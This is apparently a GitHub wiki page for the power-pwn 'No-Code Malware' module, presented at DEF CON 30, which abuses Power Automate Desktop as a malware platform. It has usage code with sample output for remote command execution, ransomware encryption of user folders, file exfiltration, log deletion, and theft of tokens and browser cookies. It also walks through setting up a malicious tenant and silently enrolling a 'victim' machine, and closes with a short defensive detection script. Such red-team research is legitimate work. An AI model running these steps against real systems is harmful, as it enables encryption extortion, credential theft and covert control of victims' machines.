
Modules: No‐Code Malware

Michael Bargury edited this page Jul 27, 2023 · 12 revisions

Description

Repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation.

This capability was first presented at a DEF CON 30 talk titled "No-Code Malware - Windows 11 at Your Service":

DEF CON 30 - Michael Bargury - No-Code Malware - Windows 11 at Your Service

Usage

```python
from powerpwn.machinepwn.machine_pwn import MachinePwn

POST_URL = ""
pp = MachinePwn(post_url=POST_URL)

### code execution

# python2
pp.exec_py2("print('hello world')").cmd_code_execution
# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='')

# python2 bad syntax
pp.exec_py2("bad syntax").cmd_code_execution
# CodeExecOutputs(ScriptOutput='', ScriptError='  File "", line 1\r\n    bad syntax\r\n        ^\r\nSyntaxError: unexpected token \'syntax\'')

# powershell
pp.exec_ps("Write-Host \"hello word\"").cmd_code_execution

# commandline
pp.exec_cmd("echo \"hello word\"").cmd_code_execution
# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='')

### ransomware

pp.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").cmd_ransomware
# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='')

### exfiltration

pp.exfil(target="C:\\Users\\alexg\\Downloads\\takeit.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=True, FileContents='asd')
pp.exfil(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=False, FileContents='')

### cleanup

pp.cleanup().cmd_cleanup
# CleanupOutputs(FilesFound=179, LogFilesDeleted=178)

### steal_power_automate_token

pp.steal_power_automate_token().cmd_steal_power_automate_token
# StealPowerAutomateTokenOutputs(Token='ey...')

### steal_cookie

pp.steal_cookie("https://www.google.com").cmd_steal_cookie
# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:')
```

How To

How to set up your cloud environment

Set up a malicious Power-Pwn Microsoft tenant

  1. Set up your free Microsoft tenant by following Microsoft guidelines

    (screenshot: Pwntoso tenant)

  2. Create a malicious user account and assign it the Power Platform administrator role. The admin role isn't required; it's just convenient.

    (screenshot: Power Platform administrator role)

  3. In a private browser tab:

    1. Go to https://flow.microsoft.com and log in with the malicious user. Follow through the sign-in process to initiate a Power Automate trial license.

    2. Follow the same process with https://make.powerapps.com to initiate a Power Apps trial license.

  4. Create a Service Principal by following Microsoft guidelines and note the tenantId, applicationId and secret.

Infect a test victim machine

  1. Infect a test machine by following the How to infect a victim machine guide.

  2. Verify that the machine has been onboarded:

    1. Log into https://flow.microsoft.com as the malicious user

    2. Click Go to Monitor and then Machines and verify that the test victim machine is there

    (screenshot: Victim machines)

Upload pwntoso to your Power Automate cloud environment

  1. Log into https://flow.microsoft.com with the malicious user.

  2. Go to Solutions and click Import solution.

    (screenshot: Import pwntoso solution)

  3. Zip the content of pwntoso_1_0_0_1 and select it when asked to provide a solution file. Follow the guided process to completion.

    1. When asked to provide a connection, follow the guided process to create a new machine connection. Use the test victim machine credentials.

  4. Go to My flows and search for Endpoint.

    (screenshot: Endpoint flow)

    Click Edit, then When a HTTP request is received, and copy the URL shown under HTTP POST URL.

    (screenshot: HTTP POST URL)

  5. Note the HTTP Post URL for use with the Python module.

How to infect a victim machine

To register a victim machine, recall the tenantId, applicationId and secret you noted while following the cloud setup guide, and run the following command (the secret is piped on stdin because `-clientsecret` is given without a value; the executable path is quoted because it contains spaces):

```
echo <secret> | "C:\Program Files (x86)\Power Automate Desktop\PAD.MachineRegistration.Silent.exe" -register -applicationid <applicationId> -tenantid <tenantId> -clientsecret -force
```

That's it! For troubleshooting, refer to Microsoft Docs.
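From a defender's side, the silent registration command above and the command execution shown in the Usage section (a shell whose working directory is the Power Automate Desktop install folder) both leave process-creation traces. The following is an added detection example, not part of power-pwn: it scans constructed process-creation records that use Sysmon Event ID 1 field names (Image, CommandLine, ParentImage, CurrentDirectory) for a silent PAD machine registration and for interpreters running out of, or launched from, the PAD install directory; the parent process name in the sample records is an assumed placeholder, as are the tenant and application IDs.

```python
import re
from dataclasses import dataclass

PAD_DIR = r"\Power Automate Desktop".lower()          # install folder fragment, matched case-insensitively
REG_EXE = "pad.machineregistration.silent.exe"         # registration binary named on this page
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "python.exe"}

@dataclass
class Finding:
    rule: str
    image: str
    detail: str

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(ev: dict) -> list:
    """Apply both rules to one process-creation record (Sysmon Event ID 1 field names)."""
    findings = []
    image, cmd = ev.get("Image", ""), ev.get("CommandLine", "")
    # Rule 1: the silent registration binary run with -register enrolls the host into a
    # tenant; -clientsecret with no value means the secret was piped on stdin, as above.
    if _basename(image) == REG_EXE and re.search(r"(^|\s)-register(\s|$)", cmd, re.I):
        detail = "silent PAD machine registration"
        if re.search(r"-clientsecret\s*(-|$)", cmd, re.I):
            detail += "; client secret supplied via stdin"
        findings.append(Finding("pad_silent_registration", image, detail))
    # Rule 2: a shell or interpreter whose working directory or parent lives in the PAD
    # install folder matches the exec_cmd/exec_ps/exec_py2 output in the Usage section.
    parent, cwd = ev.get("ParentImage", ""), ev.get("CurrentDirectory", "")
    if _basename(image) in INTERPRETERS and (PAD_DIR in cwd.lower() or PAD_DIR in parent.lower()):
        findings.append(Finding("pad_spawned_interpreter", image, f"parent={parent} cwd={cwd}"))
    return findings

def scan(events: list) -> list:
    return [f for ev in events for f in check_event(ev)]

# Constructed sample records (not real telemetry); <APP-ID>/<TENANT-ID> are placeholders.
PAD_PATH = r"C:\Program Files (x86)\Power Automate Desktop"
SAMPLE_EVENTS = [
    {"Image": PAD_PATH + r"\PAD.MachineRegistration.Silent.exe",
     "CommandLine": '"PAD.MachineRegistration.Silent.exe" -register -applicationid <APP-ID> -tenantid <TENANT-ID> -clientsecret -force',
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CurrentDirectory": r"C:\Users\victim"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": 'cmd.exe /c echo "hello word"',
     "ParentImage": PAD_PATH + r"\host.example.exe",  # assumed parent name, constructed
     "CurrentDirectory": PAD_PATH},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir",   # benign
     "ParentImage": r"C:\Windows\explorer.exe", "CurrentDirectory": r"C:\Users\victim"},
]
```

Running `scan(SAMPLE_EVENTS)` yields one finding per rule for the first two records and nothing for the benign third one.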

How to troubleshoot execution errors

SessionExistsForTheUserWhenUnattended

Got success=False with code=SessionExistsForTheUserWhenUnattended in unattendedError?

Go to Machines -> locate the machine -> three vertical dots -> Edit details -> Reuse sessions for unattended runs. See reuse sessions for unattended runs.